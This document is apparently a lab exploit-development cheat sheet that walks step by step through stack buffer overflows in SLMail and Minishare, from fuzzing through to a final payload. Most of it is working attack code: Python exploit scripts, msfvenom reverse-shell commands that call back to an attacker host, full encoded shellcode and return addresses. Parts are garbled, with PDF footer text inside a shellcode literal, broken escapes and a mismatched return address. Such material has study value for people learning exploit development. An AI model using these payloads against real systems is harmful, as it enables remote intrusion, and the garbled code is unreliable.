Basic Buffer Overflow

A command dump of the basic SL mail buffer overflow

SL Mail
At each stage exit the service and exit Immunity debugger
Reload application and reload Immunity debugger
Attach Immunity Debugger to the service
Press Play
==============
Step 1 - Check you can connect to the service
==============
#!/usr/bin/python
import socket
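# Step 1: connectivity check only. Logs in to the lab POP3 service with the
# throwaway account from the notes and echoes each server reply; nothing in
# this step overflows anything.
# Fixes relative to the original: the reply to PASS is read before it is
# printed (the original printed the stale USER reply a second time), the
# socket is closed on every path, and only socket errors are caught so that
# an unrelated exception or Ctrl-C is not reported as "Could not connect".
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print "\nSending Evil Buffer..."
    s.connect(('192.168.56.101', 110))   # lab VM from the notes, POP3 port
    data = s.recv(1024)                  # banner ("+OK POP3 server ... ready" in the notes)
    print data
    s.send('User test' + '\r\n')
    data = s.recv(1024)                  # reply to USER ("+OK test welcome here" in the notes)
    print data
    s.send('PASS test' + '\r\n')
    data = s.recv(1024)                  # reply to PASS; the original skipped this recv
    print data
    print "\nDone!"
except socket.error:
    print "Could not connect to POP3!"
finally:
    s.close()                            # released whether or not the exchange completed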
----Notes-----
python SLmail1.py
Sending Evil Buffer...
+OK POP3 server xp-fa9c63481a5e ready <00008.1253011@xp-fa9c63481a5e>
+OK test welcome here
Connection works
==============
Step 2 - Fuzz the application to cause a crash
==============
#!/usr/bin/python
import socket
# Step 2: send PASS arguments of increasing length until the service stops
# answering. Sizes tried: 1 byte, then 100, 300, 500, ... 5900 (31 cases,
# growing by 200). There is deliberately no error handling: once the service
# has crashed the next connect() raises and the loop ends, which is the
# signal the notes look for ("crash happens somewhere around the 2900 mark").
payloads = ["A"] + ["A" * size for size in range(100, 100 + 200 * 30, 200)]
for payload in payloads:
    print "Fuzzing PASS with %s bytes" % len(payload)
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(('192.168.56.101', 110))
    sock.recv(1024)                        # banner, discarded
    sock.send('USER test\r\n')
    sock.recv(1024)                        # USER reply, discarded
    sock.send('PASS ' + payload + '\r\n')  # the oversized argument under test
    sock.send('QUIT\r\n')
    sock.close()
----Notes-----
python SLmail2.py
Fuzzing PASS with 1 bytes
Fuzzing PASS with 100 bytes
Fuzzing PASS with 300 bytes
Fuzzing PASS with 500 bytes
Fuzzing PASS with 700 bytes
Fuzzing PASS with 900 bytes
Fuzzing PASS with 1100 bytes
Fuzzing PASS with 1300 bytes
Fuzzing PASS with 1500 bytes
Fuzzing PASS with 1700 bytes
Fuzzing PASS with 1900 bytes
Fuzzing PASS with 2100 bytes
Fuzzing PASS with 2300 bytes
Fuzzing PASS with 2500 bytes
Fuzzing PASS with 2700 bytes
Fuzzing PASS with 2900 bytes
Crash happens somewhere around the 2900 mark.
Look for EIP 41414141
==============
Step 3 - Ensure the expected fuzz causes a crash.
==============
Restart the service:
#!/usr/bin/python
import socket
# Step 3: reproduce the crash with one fixed-size PASS argument. The fuzzer's
# run died around the 2900-byte case, so the preceding size (2700) is sent on
# its own; the notes expect EIP to read 41414141 afterwards.
payload = 'A' * 2700
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print "\nSending Evil Buffer"
    s.connect(('192.168.56.101', 110))
    s.recv(1024)                          # banner; value not used
    s.send('USER username' + '\r\n')
    s.recv(1024)                          # USER reply; value not used
    s.send('PASS ' + payload + '\r\n')    # no reply is read: the service is expected to die here
    print "\nDone!."
except:                                   # as in the original: any exception at all prints this
    print "Could not conect to POP3!"
----Notes-----
python SLmail3.py
Should crash the server, overwriting EIP with 41414141.
==============
Step 4 - Locate EIP overwrite length/ offset.
==============
Create a 2700-byte pattern and insert it into the Python script as the buffer.
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
#!/usr/bin/python
import socket
# Step 4: send a 2700-byte cyclic pattern in place of the A's, so the four
# bytes that end up in EIP identify their own offset inside the buffer
# (pattern_offset.rb in the notes below). The literal here is the notes'
# placeholder; the output of the pattern_create.rb command above goes in
# its place.
payload = 'Aa0Aa1Aa2A-patterngoeshere-a3Aa4Aa5Aa6A'
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print "\nSending Evil Buffer"
    sock.connect(('192.168.56.101', 110))
    sock.recv(1024)                           # banner, discarded
    sock.send('USER username' + '\r\n')
    sock.recv(1024)                           # USER reply, discarded
    sock.send('PASS ' + payload + '\r\n')
    print "\nDone!."
except:                                       # bare except kept from the original
    print "Could not conect to POP3!"
----Notes-----
Note the EIP value 39694438 in Immunity Debugger.
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438
[*] Exact match at offset 2606
==============
Step 5 - Overwrite EIP with 4 x B (\x42)
==============
#!/usr/bin/python
import socket
# Step 5: prove control of EIP. pattern_offset.rb reported offset 2606, so
# that many filler bytes are followed by four "B"s, which should appear in
# EIP as 42424242, and 90 "C"s beyond them.
EIP_OFFSET = 2606
payload = "A" * EIP_OFFSET + "B" * 4 + "C" * 90
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print "\nSending Evil Buffer"
    s.connect(('192.168.56.101', 110))
    s.recv(1024)                          # banner; unused
    s.send('USER username' + '\r\n')
    s.recv(1024)                          # USER reply; unused
    s.send('PASS ' + payload + '\r\n')
    print "\nDone!."
except:                                   # any failure, not only connect, ends up here
    print "Could not conect to POP3!"
----Notes-----
Look for 42424242 in the EIP register.
==============
Step 6 - Check Buffer Length is long enough to hold reverse shellcode.
==============
#!/usr/bin/python
import socket
# Step 6: same layout as step 5, but the trailing "C"s are extended so that
# the whole argument is 3500 bytes (3500 - 2606 - 4 = 890 of them). The
# notes then check how much memory after EIP is overwritten with \x43, i.e.
# how much room there is for shellcode.
TOTAL_LEN = 3500
EIP_OFFSET = 2606
payload = "A" * EIP_OFFSET + "B" * 4 + "C" * (TOTAL_LEN - EIP_OFFSET - 4)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print "\nSending Evil Buffer"
    sock.connect(('192.168.56.101', 110))
    sock.recv(1024)                           # banner, discarded
    sock.send('USER username' + '\r\n')
    sock.recv(1024)                           # USER reply, discarded
    sock.send('PASS ' + payload + '\r\n')
    print "\nDone!."
except:                                       # bare except kept from the original
    print "Could not conect to POP3!"
----Notes-----
This should still crash the service and leave a large amount of space after EIP.
Right-click the ESP register, follow it in the dump, and check that a long run of memory is
overwritten with \x43.
==============
Step 7 - Check for bad characters
==============
#!/usr/bin/python
import socket
# Step 7: bad-character check. Every byte value 0x00-0xff is placed after the
# EIP overwrite and sent; the notes below read the bytes back by following
# ESP in the dump and look for values that are missing or cut the sequence
# short. Removing a byte from this literal, restarting and resending is
# repeated until the dump shows the full sequence through FD FE FF.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# NOTE(review): in this transcription several "\x" escapes are split across
# a line break (e.g. "\x" / "15"), so the literal is not valid Python as
# printed; in the script each wrapped line is one continuous string.
badchars = (
"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x
15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x
35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x
56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x
75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x
95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\x
b5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5
\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\x
f6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
# Offset 2606 and the 4-byte EIP filler come from steps 4 and 5; the byte
# sequence takes the place of the "C" padding that followed EIP there.
buffer = "A"*2606 +"B"*4 + badchars
try:
print "\nSending Evil Buffer"
s.connect(('192.168.56.101',110))
data = s.recv(1024)   # banner; read to keep the exchange in step, value unused
s.send('USER username' +'\r\n')
data = s.recv(1024)   # USER reply; value unused
s.send('PASS ' + buffer + '\r\n')
print "\nDone!."
except:   # NOTE(review): bare except also hides send errors and Ctrl-C behind the message below
print "Could not conect to POP3!"
----Notes-----
Follow ESP in the dump and check which character is missing or where the sequence is
cut short; remove that character, rerun, and repeat until none are missing.
It should read 01 02 03 04 05 -missing- 07, which means \x06 is a bad character.
Restart the debugger and the service every time you do this and rerun the script.
Note the bad characters you remove. When the final three bytes read FD FE FF, all of them
have been removed and the sequence is no longer truncated.
In this case they are:
\x00\x0a\x0d
==============
Step 8 - Locate JMP ESP
==============
In immunity debugger type
!mona modules
Choose a DLL whose row reads FALSE FALSE FALSE FALSE TRUE.
If it contains no JMP ESP, move on to another one,
e.g. SLMFC.dll
Upload jumpesp.exe to the host and run the following command:
findjmp.exe slmfc.dll esp
Choose a jmp esp from the list
I.e:
0x5F4B41E3
Convert to little endian
5F | 4B | 41 | E3
\xe3\x41\x4b\x5f
Or In Immunity Debugger:
!mona find -s "\xff\xe4" -m slmfc.dll
=============
Step 9 - Final Overflow
=============
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 -f c -e
x86/shikata_ga_nai -b "\x00\x0a\x0d"
Check that the output really was encoded with x86/shikata_ga_nai; otherwise bad characters will still be present.
#!/usr/bin/python
import socket
# Step 9: final payload. Layout, with each value taken from the earlier steps:
#   "A" * 2606           filler up to the saved return address (offset from step 4)
#   "\xe3\x41\x4b\x5f"   the step 8 JMP ESP address (bytes 5F 4B 41 E3) in little-endian order
#   "\x90" * 8           short NOP sled
#   shellcode            msfvenom output from the command above, 351 bytes,
#                        encoded to avoid the step 7 bad characters \x00\x0a\x0d
# Total 2969 bytes, inside the 3500 bytes step 6 showed to be overwritable.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
shellcode = (
"\xd9\xc8\xbe\xf1\x66\xed\xf4\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x52\x31\x73\x17\x03\x73\x17\x83\x32\x62\x0f\x01\x48\x83\x4d"
"\xea\xb0\x54\x32\x62\x55\x65\x72\x10\x1e\xd6\x42\x52\x72\xdb"
"\x29\x36\x66\x68\x5f\x9f\x89\xd9\xea\xf9\xa4\xda\x47\x39\xa7"
"\x58\x9a\x6e\x07\x60\x55\x63\x46\xa5\x88\x8e\x1a\x7e\xc6\x3d"
"\x8a\x0b\x92\xfd\x21\x47\x32\x86\xd6\x10\x35\xa7\x49\x2a\x6c"
"\x67\x68\xff\x04\x2e\x72\x1c\x20\xf8\x09\xd6\xde\xfb\xdb\x26"
"\x1e\x57\x22\x87\xed\xa9\x63\x20\x0e\xdc\x9d\x52\xb3\xe7\x5a"
"\x28\x6f\x6d\x78\x8a\xe4\xd5\xa4\x2a\x28\x83\x2f\x20\x85\xc7"
"\x77\x25\x18\x0b\x0c\x51\x91\xaa\xc2\xd3\xe1\x88\xc6\xb8\xb2"
"\xb1\x5f\x65\x14\xcd\xbf\xc6\xc9\x6b\xb4\xeb\x1e\x06\x97\x63"
"\xd2\x2b\x27\x74\x7c\x3b\x54\x46\x23\x97\xf2\xea\xac\x31\x05"
"\x0c\x87\x86\x99\xf3\x28\xf7\xb0\x37\x7c\xa7\xaa\x9e\xfd\x2c"
"\x2a\x1e\x28\xe2\x7a\xb0\x83\x43\x2a\x70\x74\x2c\x20\x7f\xab"
"\x4c\x4b\x55\xc4\xe7\xb6\x3e\x2b\x5f\x80\xbf\xc3\xa2\xf0\xbe"
"\xa8\x2a\x16\xaa\xde\x7a\x81\x43\x46\x27\x59\xf5\x87\xfd\x24"
"\x35\x03\xf2\xd9\xf8\xe4\x7f\xc9\x6d\x05\xca\xb3\x38\x1a\xe0"
# NOTE(review): the next two lines are page header/footer text left by the
# PDF extraction, not part of the script; the literal continues below them.
Buffer Overflow - SL-Mail
22
"\xdb\xa7\x89\x6f\x1b\xa1\xb1\x27\x4c\xe6\x04\x3e\x18\x1a\x3e"
"\xe8\x3e\xe7\xa6\xd3\xfa\x3c\x1b\xdd\x03\xb0\x27\xf9\x13\x0c"
"\xa7\x45\x47\xc0\xfe\x13\x31\xa6\xa8\xd5\xeb\x70\x06\xbc\x7b"
"\x04\x64\x7f\xfd\x09\xa1\x09\xe1\xb8\x1c\x4c\x1e\x74\xc9\x58"
"\x67\x68\x69\xa6\xb2\x28\x99\xed\x9e\x19\x32\xa8\x4b\x18\x5f"
"\x4b\xa6\x5f\x66\xc8\x42\x20\x9d\xd0\x27\x25\xd9\x56\xd4\x57"
"\x72\x33\xda\xc4\x73\x16")
buffer = "A"*2606 +"\xe3\x41\x4b\x5f" + "\x90"*8 + shellcode
try:
print "\nSending Evil Buffer"
s.connect(('192.168.56.101',110))
data = s.recv(1024)   # banner; value unused
s.send('USER username' +'\r\n')
data = s.recv(1024)   # USER reply; value unused
s.send('PASS ' + buffer + '\r\n')   # no reply is read and the socket is never closed explicitly
print "\nDone!."
except:   # NOTE(review): bare except reports every failure, not only connect errors, as this message
print "Could not conect to POP3!"

Minishare
==============
Step 1 - Crash The Service
==============
#!/usr/bin/python
import socket
# Minishare step 1: one HTTP GET whose request path is 2000 "A" bytes. No
# error handling: the script only reports that the request went out, and the
# notes check by hand whether the service is still up.
target_address = "192.168.56.101"
target_port = 81
print "Sending long URL"
request = "GET " + "\x41" * 2000 + " HTTP/1.1\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(request)
sock.close()
print "Sent! Check the server has crashed"
==============
Step 2 - Find The ESP
==============
#!/usr/bin/python
#Stage 2
#root@xps:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l
2000
import socket
# Minishare stage 2: the 2000-byte cyclic pattern from the pattern_create.rb
# command in the header comment replaces the A's, so the value left in EIP
# can be turned into an offset with pattern_offset.rb (stage 3).
target_address="192.168.56.101"
target_port=81
print "Sending long URL"
buffer ="GET "
# NOTE(review): the extraction split `buffer +=` over two lines and wrapped
# the pattern; in the script this is a single `buffer += "..."` statement
# with an unbroken literal.
buffer
+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1
Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4
Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8A
g9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4
Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am
0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1
Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4
Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8A
s9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3
Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5A
x6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9
Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2
Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5
Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9B
h0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5B
j6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1
Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo
3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq
6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0B
t1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv
5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7
Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0C
a1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc
3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5
Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg
9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj
4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9
Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co
0Co1Co2Co3Co4Co5Co"
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))   # connect() returns None; `connect` is never used
sock.send(buffer)
sock.close()
print "Sent! Check the server has crashed"
==============
Step 3 - Overwrite EIP with B's
==============
#!/usr/bin/python
#Stage 3
#root@xps:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l
2000
#root@xps:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q
36684335
import socket
# Minishare stage 3: pattern_offset.rb (header comment) put the EIP overwrite
# at offset 1787. The request path is therefore 1787 filler bytes, four "B"s
# that should show up in EIP as 42424242, and "C"s up to a total of 1866.
target_address = "192.168.56.101"
target_port = 81
print "Sending long URL"
EIP_OFFSET = 1787
PATH_LEN = 1866
path = "A" * EIP_OFFSET + "B" * 4 + "C" * (PATH_LEN - EIP_OFFSET - 4)
request = "GET " + path + " HTTP/1.1\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(request)
sock.close()
print "Sent! Check the server has crashed"
==============
Step 4 - Increase Buffer Size to make sure we have room for shellcode
==============
#!/usr/bin/python
#Stage 4
#root@xps:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l
2000
#root@xps:10.11.1.125# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q
36684335
#Increase buffer size to see if our shellcode works and has enough space
import socket
# Minishare stage 4: same layout as stage 3 but with 409 "C"s after the EIP
# overwrite (2200 bytes in total), to check that enough memory past EIP is
# overwritten to hold shellcode later.
target_address = "192.168.56.101"
target_port = 81
print "Sending long URL"
EIP_OFFSET = 1787
TAIL_LEN = 409
path = "A" * EIP_OFFSET + "B" * 4 + "C" * TAIL_LEN
request = "GET " + path + " HTTP/1.1\r\n\r\n"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_address, target_port))
sock.send(request)
sock.close()
print "Sent! Check the server has crashed"
==============
Step 5 - Find return Address and remove all bad characters
==============
#!mona modules
#!mona find -s "\xff\xe4" -m user32.dll = 0x73429353
73 | 42 | 93 | 53
\x53\x93\x42\x73
See stage 7 from SLMail for finding bad characters.
==============
Step 6 - Generate New Reverse Shell
==============
#!/usr/bin/python
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 -b
"\x00\x0a\x0d" -f c
import socket
# Minishare stage 6: final request. The shellcode is the msfvenom output from
# the header comment (351 bytes, generated with -b "\x00\x0a\x0d"). Request
# path layout: 1787 filler bytes (stage 3 offset), the 4-byte return address,
# a 20-byte NOP sled, then the shellcode - 2162 bytes, inside the 2200 bytes
# stage 4 showed to be overwritable.
shellcode = (
"\xdb\xd8\xbf\x4c\x49\x8a\x73\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
"\x52\x83\xea\xfc\x31\x7a\x13\x03\x36\x5a\x68\x86\x3a\xb4\xee"
"\x69\xc2\x45\x8f\xe0\x27\x74\x8f\x97\x2c\x27\x3f\xd3\x60\xc4"
"\xb4\xb1\x90\x5f\xb8\x1d\x97\xe8\x77\x78\x96\xe9\x24\xb8\xb9"
"\x69\x37\xed\x19\x53\xf8\xe0\x58\x94\xe5\x09\x08\x4d\x61\xbf"
"\xbc\xfa\x3f\x7c\x37\xb0\xae\x04\xa4\x01\xd0\x25\x7b\x19\x8b"
"\xe5\x7a\xce\xa7\xaf\x64\x13\x8d\x66\x1f\xe7\x79\x79\xc9\x39"
"\x81\xd6\x34\xf6\x70\x26\x71\x31\x6b\x5d\x8b\x41\x16\x66\x48"
"\x3b\xcc\xe3\x4a\x9b\x87\x54\xb6\x1d\x4b\x02\x3d\x11\x20\x40"
"\x19\x36\xb7\x85\x12\x42\x3c\x28\xf4\xc2\x06\x0f\xd0\x8f\xdd"
"\x2e\x41\x6a\xb3\x4f\x91\xd5\x6c\xea\xda\xf8\x79\x87\x81\x94"
"\x4e\xaa\x39\x65\xd9\xbd\x4a\x57\x46\x16\xc4\xdb\x0f\xb0\x13"
"\x1b\x3a\x04\x8b\xe2\xc5\x75\x82\x20\x91\x25\xbc\x81\x9a\xad"
"\x3c\x2d\x4f\x61\x6c\x81\x20\xc2\xdc\x61\x91\xaa\x36\x6e\xce"
"\xcb\x39\xa4\x67\x61\xc0\x2f\x48\xde\xf2\xae\x20\x1d\x02\xb0"
"\x0b\xa8\xe4\xd8\x7b\xfd\xbf\x74\xe5\xa4\x4b\xe4\xea\x72\x36"
"\x26\x60\x71\xc7\xe9\x81\xfc\xdb\x9e\x61\x4b\x81\x09\x7d\x61"
"\xad\xd6\xec\xee\x2d\x90\x0c\xb9\x7a\xf5\xe3\xb0\xee\xeb\x5a"
"\x6b\x0c\xf6\x3b\x54\x94\x2d\xf8\x5b\x15\xa3\x44\x78\x05\x7d"
"\x44\xc4\x71\xd1\x13\x92\x2f\x97\xcd\x54\x99\x41\xa1\x3e\x4d"
"\x17\x89\x80\x0b\x18\xc4\x76\xf3\xa9\xb1\xce\x0c\x05\x56\xc7"
"\x75\x7b\xc6\x28\xac\x3f\xf6\x62\xec\x16\x9f\x2a\x65\x2b\xc2"
"\xcc\x50\x68\xfb\x4e\x50\x11\xf8\x4f\x11\x14\x44\xc8\xca\x64"
"\xd5\xbd\xec\xdb\xd6\x97"
)
target_address="192.168.56.101"
target_port=81
print "Sending exploit"
buffer ="GET "
# NOTE(review): stage 5 derives the little-endian address \x53\x93\x42\x73
# from 0x73429353; the last byte here is \x7e instead, so one of the two is
# a transcription error - the two values should agree.
buffer +="A" * 1787 + "\x53\x93\x42\x7e" + "\x90" * 20 + shellcode
buffer +=" HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))   # connect() returns None; `connect` is never used
sock.send(buffer)   # no response is read before closing
sock.close()
print "Sent! Did you get a shell?"

